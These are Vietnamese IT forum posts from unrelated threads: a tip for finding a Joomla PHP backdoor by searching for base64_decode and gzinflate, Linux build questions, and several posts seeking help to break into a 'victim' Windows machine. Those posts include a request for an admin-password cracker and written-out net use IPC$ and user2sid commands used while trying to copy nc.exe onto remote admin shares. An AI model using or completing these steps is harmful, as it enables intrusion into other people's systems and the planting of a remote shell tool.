|
|
Site mình (sử dụng joomla) vừa bị một con back-door kid.php, vì nó đặt tên lạ và đặt ở ngoài root nên nhìn là biết ngay. Lỡ như nó đổi tên giống với các file trong hệ thống (như: error.php hay log_nt.php) và đặt trong một góc nào đó thì cũng khó mà tìm ra.
Nó sử dụng base64_decode(), vậy nếu chúng ta dùng cách search chuỗi "base64_decode" thì cũng có thể lọc được một số back-door dạng này, cách này thì ở trên đã có rồi, ngoài ra nó còn dùng gzinflate().
Vậy các bạn có thể search thêm chuỗi "gzinflate" trong source code để tìm kiếm back-door được hiệu quả hơn.
PS: có ai từng gặp backdoor kid.php này chưa vậy ? Trong source code có dòng chữ "Developed by [K]id" đó
|
|
|
Tôi cần quyển sách tên Zend Framework: The Official Programmer’s Reference Guide
[url]
http://www.amazon.com/Zend-Framework-Official-Programmer-Reference/dp/1430219068/ref=sr_1_2?ie=UTF8&s=books&qid=1260077974&sr=8-2[/url]
|
|
|
Hi all,
Mình đang tính thi liên thông đại học vào đại học Khoa học tự nhiên ngành CNTT. Trước đây mình học mạng và 1 ít lập trình, chủ yếu học mạng nhiều hơn. Nếu bạn nào có thi rồi có thể cho mình biết những tài liệu nào cần thiết cho việc ôn tập được không ?
Thanks.
|
|
|
Tôi chỉ tìm thấy các gói glib, gtk,atk, pango trên internet thôi. Còn các gói development hay headers thì bó tay.
Tôi đã thử lệnh:
./configure GLIB_CFLAGS=/thu-muc-chua-glib/include/glib-2.0 GLIB_LIBS=/thu-muc-chua-glib/lib/
Nhưng vẫb báo lỗi không tìm thấy gói glib2.0
Tôi đã xem ./configure --help nhưng vẫn chưa tìm ra GLIB_LIBS là gì.
Nếu như tôi muốn đưa 2 đường dẫn đến 2 thư mục sau ./configure thì tôi phải viết câu lệnh ./configure như thế nào ?
|
|
|
Sau khi giải nén pidgin-2.0.0.tar.bz2, tiến hành lệnh ./configure thì chương trình báo lỗi như sau:
checking for GLIB... Package glib-2.0 was not found in the pkg-config search path.
Perhaps you should add the directory containing `glib-2.0.pc'
to the PKG_CONFIG_PATH environment variable
No package 'glib-2.0' found
no
no
configure: error:
You must have the GLib 2.0 development headers installed to build.
Sau đó, tôi download glib-2.0.0.tar.bz2 về máy, thực hiện như sau:
#tar -jxvf glib-2.0.0.tar.bz2
#cd glib-2.0.0
#./configure (không có báo lỗi)
#make
#make install
Tôi vào thư mục pidgin-2.0.0, và gõ lệnh ./configure thì chương trình vẫn báo lỗi :
checking for GLIB... Package glib-2.0 was not found in the pkg-config search path.
Perhaps you should add the directory containing `glib-2.0.pc'
to the PKG_CONFIG_PATH environment variable
No package 'glib-2.0' found
no
no
configure: error:
You must have the GLib 2.0 development headers installed to build.
Tôi đang xài Fedora Core release 1 (Yarrow)
, ai biết xin chỉ giúp, thanx
|
|
|
Có tool nào có thể crack password của admin khong vậy ?
|
|
|
Dùng Essential Net Tool/Nat dò được kết quả tại ip.x.x.x:
user: administrator ,pass: read ,share E$: read- write access
Sau đó, dùng user2sid:
c:\>user2sid \\x.x.x.x "administrator"
-> S-1-5-................-500
Dựa vào 500, có thể khẳng định user "administrator" là admin của x.x.x.x. hay không ?
c:\>net use \\x.x.x.x\ipc$ "read"/user:"administrator"
Command completed successfully
c:\>copy nc.exe \\x.x.x.x\e$\nc.exe
acesss denied
Tại sao lại không copy được với user "administrator" ?
Ổ E$ sao không truy cập được?
Ai biết xin chỉ giùm
Thanx )
|
|
|
Tai sao admin ma` không có quyền write, bạn co' thể chỉ rõ hơn được không?
Vậy sau câu lệnh dưới đây, nếu muốn copy 1 file lên máy của victim thì phải làm gì ?
c:\>net use \\x.x.x.x.\ipc$ ""/user:"admin"
Command completed successfully
|
|
|
Sau khi kết nối IPC$ thành công, mình dùng lệnh copy:
C:>\copy nc.exe \\x.x.x.x\admin$\nc.exe
Access denied
Thử C$ hay mấy cái khác cũng báo lỗi
|
|
|
Đã kết nối thành công bằng Ipc$
c:\>net use \\x.x.x.x.\ipc$ ""/user:"admin"
Command completed successfully
Nhưng vẫn không copy file vào máy victim được
Nhờ các huynh chỉ giùm
|
|